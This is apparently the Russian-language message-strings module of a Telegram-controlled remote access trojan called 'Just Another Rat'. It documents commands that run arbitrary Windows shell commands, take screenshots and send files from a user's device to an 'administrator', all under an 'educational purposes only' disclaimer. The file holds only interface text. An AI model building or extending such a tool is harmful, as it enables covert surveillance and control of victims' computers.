# -*- coding: utf-8 -*-
"""Все тексты ответов бота."""

CD_1: str = """
*📁 Текущая директория:*

```
%s
```
""".strip()

CD_2: str = """
*📁 Установлена директория:*

```
%s
```
""".strip()

CD_3: str = """
*❌ Ошибка*

Вероятно такой директории не существует.
""".strip()

CD_DOC: str = """
*📄 Команда /cd*:

Меняет текущую рабочую директорию на указанную.
Используйте без аргументов (`/cd`), чтобы получить текущую директорию.
""".strip()

DIR: str = """
*📁 Список файлов и каталогов:*

```
%s
```
""".strip()

DIR_DOC: str = """
*📄 Команда /dir*:

Выводит список файлов и каталогов в текущей директории.

*⚠️ Некоторые символы могут быть нечитаемыми из-за проблем с кодировкой.*
""".strip()

DOWNLOAD_1: str = """
*❌ Ошибка*

Файл не найден:
```
%s
```
""".strip()

DOWNLOAD_2: str = """
🕒 Файл отправляется, подождите...
""".strip()

DOWNLOAD_3: str = """
📄 Запрошенный файл.
""".strip()

DOWNLOAD_DOC: str = """
*📄 Команда /download*:

Скачивает файл с устройства пользователя и отправляет в чат администратору.
"""

EXECUTE_1: str = """
*💻 Результат выполнения команды:*

```
%s
```
""".strip()

EXECUTE_2: str = """
✅ Команда была выполнена, но ничего не вернула.
""".strip()

EXECUTE_DOC: str = """
*📄 Команда /execute*:

Выполняет переданную команду и отправляет результат её выполнения.

Например: `/execute cd`.

*⚠️ Некоторые символы могут быть нечитаемыми из-за проблем с кодировкой.*
""".strip()

HELP: str = """
*📃 Доступные команды утилиты*

*📁 /cd*
Сменить рабочую директорию.

*📁 /dir*
Получить список файлов и каталогов.

*💻 /execute*
Выполнить переданную команду.

*⚙️ /help*
Вывести список команд бота.

*🖼️ /screenshot*
Сделать снимок экрана пользователя.

*⚙️ /start*
Начать диалог с ботом.

*💻 /terminal*
Перейти в режим терминала.

Используйте аргумент `/?`, чтобы получить более подробную справку по команде.
Например: `/help /?`
""".strip()

HELP_DOC: str = """
*📄 Команда /help*:

Выводит список всех команд бота и их краткое описание.
""".strip()

SCREENSHOT: str = """
🖼️ Снимок экрана успешно создан!
""".strip()

SCREENSHOT_DOC: str = """
*📄 Команда /screenshot*:

Делает снимок экрана пользователя и отправляет его администратору.

*⚠️ Снимок может прийти не сразу, если у пользователя слабое соединение с Интернетом.*
""".strip()  # noqa: E501

START: str = """
💻    *Just Another Rat*

❗ Используйте утилиту исключительно в образовательных целях!

❗ Разработчик не несёт никакой ответственности за ваши действия!

💡 Используйте команду */help*, чтобы вывести список доступных команд.

🔗 Страница проекта на GitHub - [Just Another Rat](https://github.com/Shuwiku/just_another_rat)
""".strip()  # noqa: E501

START_DOC: str = """
*📄 Команда /start*:

Первое сообщение в диалоге с ботом.
Выводит предупреждение и краткое описание проекта.
""".strip()

TERMINAL_1: str = """
*💻 Вы вошли в режим терминала.*
""".strip()

TERMINAL_2: str = """
*💻 Вы вышли из режима терминала.*
""".strip()

TERMINAL_3: str = """
```
\\> %s

%s
```
""".strip()

TERMINAL_4: str = """
```
\\> %s

Команда ничего не вернула.
```
""".strip()

TERMINAL_DOC: str = """
*📄 Команда /terminal*:

Переводит бота в состояние терминала. В этом состоянии каждое сообщение администратора будет обрабатываться как команда терминала Windows.

Изменено поведение только для команды *cd*.

Используйте команду */exit*, чтобы выйти из режима терминала.
""".strip()  # noqa: E501
